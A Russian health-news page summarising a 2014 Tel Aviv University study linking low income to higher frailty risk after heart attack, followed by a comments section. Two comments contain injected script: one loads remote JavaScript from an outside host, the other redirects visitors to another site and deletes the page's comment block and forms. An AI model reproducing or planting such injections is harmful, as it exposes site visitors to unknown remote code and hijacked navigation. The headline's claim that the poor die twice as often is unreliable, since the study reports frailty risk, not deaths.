Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Еще один повод ходить на ...  >>  Еще один повод ходить на работу! Бедные умирают в 2 раза чаще богатых!
 
Обратная связь
 

Еще один повод ходить на работу! Бедные умирают в 2 раза чаще богатых!

Размер шрифта
16 июля 2014 00:00
Юрий Малышев
Здоровье инфо
Полина Калинина
Здоровье инфо
  • google_analytics: false
  • Нравится

Ни для кого не секрет, что с возрастом организм изнашивается. Но у бедных это происходит в два раза чаще!

Еще один повод ходить на работу! Бедные умирают в 2 раза чаще богатых!

Исследование, проведенное Департаментом эпидемиологии и превентивной медицины Тель-Авивского Университета, показало, что у людей с низкими доходами риск развития так называемой старческой астении после инфаркта в два раза выше, чем у более состоятельных больных.  Возможно, эти результаты помогут обратить внимание на проблему и наладить реабилитацию для бедных пациентов после инфаркта.

«Мы обнаружили тесную зависимость развития старческой астении и социально-экономического статуса населения, – говорит исследователь Вики Майерс. – Возможно, диагностика старческой слабости поможет выявить пациентов с наиболее высоким риском инфаркта миокарда».

Определение старческой астении включает физические, психологические и функциональные аспекты, и эффективно диагностировать это состояние можно лишь с помощью анализа перечисленных сторон жизни пациента. Специалисты составили список из 40 показателей, которые следует оценить в рамках диагностики.

Чем бедные хуже?

В ходе исследования ученые оценили данные 1 151 пациента, которые лечились в Израиле с диагнозом инфаркта миокарда. Наиболее частые факторы, встречавшиеся у них, включали диабет 2 типа, низкую физическую активность, быструю утомляемость, ограничение в труде, а также их собственное мнение об «изношенности» и «старости» своего организма.

Выяснилось, что у 35% пациентов старческая астения развилась в течение 10 лет после инфаркта миокарда. Также у них часто регистрировались повторные случаи инфаркта и ожирение. Кроме того, большинство пациентов характеризовалось низким социально-экономическим статусом, низким уровнем образования и доходов, безработицей, проживанием в неблагополучных районах.

Удивительно, но пациенты со старческой астенией имели меньше случаев госпитализаций в отделение реанимации, операций, выписанных препаратов. Специалисты связали это с низким уровнем здравоохранения у бедного населения. Кроме того, проживание в районах для бедных показало связь с 60-процентным повышением риска старческой астении по сравнению с проживанием в благополучных районах.

Взгляд в будущее

Низкий социально-экономический статус тесно связан с плохим состоянием здоровья. Люди с низкими доходами имеют меньший доступ к благам здравоохранения, меньше осведомлены о вопросах здоровья и чаще подвергаются рискам: курению, нерациональному питанию, низкой физической активности.

Основываясь на собственных результатах, исследовательская группа пытается внедрить профилактику старческой астении у групп пациентов с высоким риском, а также дополнительные лечебные мероприятия для населения с низкими доходами с упором на реабилитацию для пациентов с инфарктом.

Хотите больше узнать о новейших открытиях в области кардиологии и рекомендации ведущих специалистов? Читайте наш спецпроект «Близко к сердцу».

Данная статья основана на материалах, предоставленных Школой общественного здоровья Тель-Авивского Университета. Результаты исследования были опубликованы в «International Journal of Cardiology» в 2014 году.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:36

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:32

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Как угробить свое сердце?!   Не психуй! Взрывы гнева увеличивают шансы инфаркта!   10 ужасов недосыпа   Худшие соусы  
22 июня 2013Грецкие орехи спасут от инфаркта 18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя?
 
20 июня 2013Собака спасет от инфаркта! Какую породу завести, чтобы не умереть 12 июня 2013Обычный шум может вызвать остановку сердца! Как избежать этого?
 

Слайдшоу

1
Зачем спать 10 затем
Как решить все проблемы за 90 секунд. Часть 1
6 суперпродуктов от диабета

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.